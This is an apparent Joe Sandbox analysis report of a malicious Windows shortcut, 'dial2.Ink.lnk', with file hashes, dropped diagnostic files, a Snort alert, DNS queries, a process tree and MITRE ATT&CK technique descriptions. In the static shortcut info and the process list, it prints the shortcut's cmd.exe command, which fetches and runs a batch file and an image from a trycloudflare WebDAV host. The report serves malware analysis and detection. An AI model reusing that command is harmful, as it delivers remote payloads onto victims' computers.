Preview:	..#. .L.o.c.a.l.i.z.e.d...1.2./.0.7./.2.0.1.9. .1.1.:.5.3. .A.M. .(.G.M.T.)...3.0.3.:.6...4.0...2.0.5.2.0. ...L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.........#.#.#.P.S.L.O.C.........p.r.o.g.r.e.s.s._.D.i.a.g.n.o.s.i.n.g._.N.o.D.e.t.a.i.l.s.=.L.o.o.k.i.n.g. .f.o.r. .p.r.o.b.l.e.m.s...........p.r.o.g.r.e.s.s._.D.i.a.g.n.o.s.i.n.g._.S.a.f.e.M.o.d.e.=.V.e.r.i.f.y.i.n.g. .b.o.o.t. .m.o.d.e...........p.r.o.g.r.e.s.s._.D.i.a.g.n.o.s.i.n.g._.D.P.S.=.V.e.r.i.f.y.i.n.g. .t.h.a.t. .t.h.e. .n.e.t.w.o.r.k. .d.i.a.g.n.o.s.t.i.c.s. .s.e.r.v.i.c.e. .i.s. .r.u.n.n.i.n.g...........p.r.o.g.r.e.s.s._.D.i.a.g.n.o.s.i.n.g._.I.n.i.t.i.a.l.i.z.i.n.g.=.S.t.a.r.t.i.n.g. .n.e.t.w.o.r.k. .d.i.a.g.n.o.s.t.i.c.s...........p.r.o.g.r.e.s.s._.R.e.p.a.i.r.i.n.g.=.E.x.e.c.u.t.i.n.g. .R.e.p.a.i.r...........p.r.o.g.r.e.s.s._.V.a.i.l.d.a.t.i.n.g._.N.o.D.e.t.a.i.l.s.=.V.e.r.i.f.y.i.n.g. .t.h.a.t. .t.h.e. .p.r.o.b.l.e.m. .i.s. .r.e.s.o.l.v.e.d...........p.r.o.g.r.e.s.s.

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\result\results.xsl

Download File

Process:	C:\Windows\System32\msdt.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	48956
Entropy (8bit):	5.103589775370961
Encrypted:	false
SSDEEP:	768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
MD5:	310E1DA2344BA6CA96666FB639840EA9
SHA1:	E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
SHA-256:	67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
SHA-512:	62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
Malicious:	false
Preview:	<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ******** Images ******** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

\Device\ConDrv

Download File

Process:	C:\Windows\System32\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.625060946214589
Encrypted:	false
SSDEEP:	3:lwFL5WvFN0Ked18SARJOaKWR6WEMYV3Cwv:laWv3ed1/A7OXMICwv
MD5:	EA30C563F5D70CB0C4232D692B93346E
SHA1:	F0D28A8CACDFD35B2587F3F673E748100DBC28D6
SHA-256:	569E17E6BB0D00D37BA50D0E63827FB0FBB31785EF75C9920C315EBFDEA4C9A0
SHA-512:	F641B6553A2BBAF322DC0DD4650E5E589526736ADE6E5B19A09743113EB603C78CB880DA58495C715BCF2EDA830EEBC2159D4B3F44F66ECC2A97AC416BCB0901
Malicious:	false
Preview:	..Starting network snapshot... .. ..Network snapshot complete. .. Network Diagnostics failed (error=0x80070002).....

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Mon Oct 30 08:59:20 2023, mtime=Mon Oct 30 08:59:20 2023, atime=Mon Oct 30 08:59:20 2023, length=278528, window=hidenormalshowminimized
Entropy (8bit):	4.5118522866203765
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	dial2.Ink.lnk
File size:	2'025 bytes
MD5:	e12f74c1f35c4f7d07f5615757729526
SHA1:	809096004d6255f491f6d477d94d72bd46b9e023
SHA256:	d577c12707f3c3c4aed546e08525caf2e24c4cebc8ab1658c6d870c09177bcbf
SHA512:	3a9edb1f90765e8f236e8c2fcc5c4f3e6e4277f1d2658188a9410928c4e62dc15b79b5e6d1e338e6eb3c64eecae8fad53e0616c7155bfec0041bcc80e1c730a9
SSDEEP:	48:8EJoWcufOX4jjJ2JXjJ2Keh4UWJBE2Fe7:8uodX43JCzJneOUCBE8e7
TLSH:	5441A6062BFE5B20F7F30F7019B556B59E32789BAA91DB2D4148010E09B4F14EDA4F67
File Content Preview:	L..................F.... ....Jx.......}.......}......@......................5....P.O. .:i.....+00.../C:\...................V.1.....GX....Windows.@......./M.1GX.............................!w.W.i.n.d.o.w.s.....Z.1.....SXc7..System32..B......./M.1SXc7......

File Icon


Icon Hash:	74f0e4e4e4e1e1ed

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\Windows\System32\cmd.exe
Command Line Argument:	/c start "" /min \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\file.bat & start \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\1.jpg
Icon location:	\\diatruiest.com@80\sniptool\work\a.ico

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/24/24-11:03:00.227669	UDP	2052731	ET TROJAN DNS Query to Malware Delivery Related Domain (boy-such-icon-positive .trycloudflare .com)	50669	53	192.168.2.7	1.1.1.1

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 11:03:00.227669001 CEST	50669	53	192.168.2.7	1.1.1.1
May 24, 2024 11:03:00.253319025 CEST	53	50669	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 24, 2024 11:03:00.227669001 CEST	192.168.2.7	1.1.1.1	0xe52c	Standard query (0)	boy-such-icon-positive.trycloudflare.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 24, 2024 11:03:00.253319025 CEST	1.1.1.1	192.168.2.7	0xe52c	Name error (3)	boy-such-icon-positive.trycloudflare.com	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	05:02:59
Start date:	24/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c start "" /min \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\file.bat & start \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\1.jpg
Imagebase:	0x7ff687c80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	05:02:59
Start date:	24/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	05:03:12
Start date:	24/05/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp
Imagebase:	0x7ff700510000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	05:03:12
Start date:	24/05/2024
Path:	C:\Windows\System32\msdt.exe
Wow64 process (32bit):	false
Commandline:	-skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp" -ep "NetworkDiagnosticsSharing"
Imagebase:	0x7ff7724f0000
File size:	499'200 bytes
MD5 hash:	3AE6BFDF0257B303EDD695DA183C8462
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	05:03:18
Start date:	24/05/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
Imagebase:	0x7ff67c350000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dial2.Ink.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\NDF1936.tmp

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.diagpkg

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.dll

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\HTInteractiveRes.ps1

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\InteractiveRes.ps1

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticSnapIn.dll

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsResolve.ps1

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsTroubleshoot.ps1

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticsVerify.ps1

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\StartDPSService.ps1

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\UtilityFunctions.ps1

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\UtilitySetConstants.ps1

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\DiagPackage.dll.mui

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\LocalizationData.psd1

C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\result\results.xsl

\Device\ConDrv

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Network Behavior

Snort IDS Alerts

Windows Analysis Report
dial2.Ink.lnk